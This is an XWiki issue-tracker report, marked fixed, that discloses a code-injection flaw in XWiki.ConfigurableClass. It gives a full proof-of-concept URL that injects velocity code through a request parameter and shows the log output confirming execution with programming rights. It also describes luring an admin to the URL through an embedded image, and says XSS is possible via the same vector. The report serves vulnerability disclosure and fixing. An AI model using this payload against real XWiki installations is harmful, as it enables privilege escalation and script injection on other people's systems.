Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
2.3
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
As an admin user, open <xwiki-host>/xwiki/bin/view/%22%3E%7B%7B%2Fhtml%7D%7D%7B%7Basync%20context%3D%22request/parameters%22%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request/eval)/?sheet=XWiki.ConfigurableClass&xpage=view&eval=$services.logging.getLogger(%22attacker%22).error(%22Attack%20success%20$hasProgramming%22) where <xwiki-host> is the URL of your XWiki installation.
Alternatively, as a user with edit right, first create a configurable section as, e.g., explained on XWIKI-21121.
Expected result:
The code in the URL is not executed.
Actual result:
A message like
2023-07-25 17:24:07,226 [org.xwiki.rendering.async.internal.AsyncRendererJob@778eca14([async, macro, xwiki:XWiki.ConfigurableClass, 8, author, xwiki:XWiki.Admin, rendering.restricted, false, request.parameters, {xpage=[Ljava.lang.String;@6d34dae1, sheet=[Ljava.lang.String;@7a1c53cf, eval=[Ljava.lang.String;@43bfe9cb}, secureDocument, xwiki:XWiki.ConfigurableClass, 459])] ERROR attacker - Attack success true
is logged, showing that that code has been executed with programming right.
For this attack to succeed, the user needs to have edit right on at least one configurable section so this is not a remote code execution attack from guest. However, it is possible to trick an admin into visiting the URL to trigger the attack, e.g., by embedding the URL as an image in a comment.
Also, via the same attack vector, XSS is possible, too.
It seems that the vulnerable code has been introduced in XAADMINISTRATION-112 which seems to have been released in XWiki 2.3, see https://www.xwiki.org/xwiki/bin/view/ReleaseNotes/ReleaseNotesXWikiEnterprise23#HEasierdevelopmentofconfigurableapplicationsusingXWiki.ConfigurableClass
Attachments
Issue Links
- links to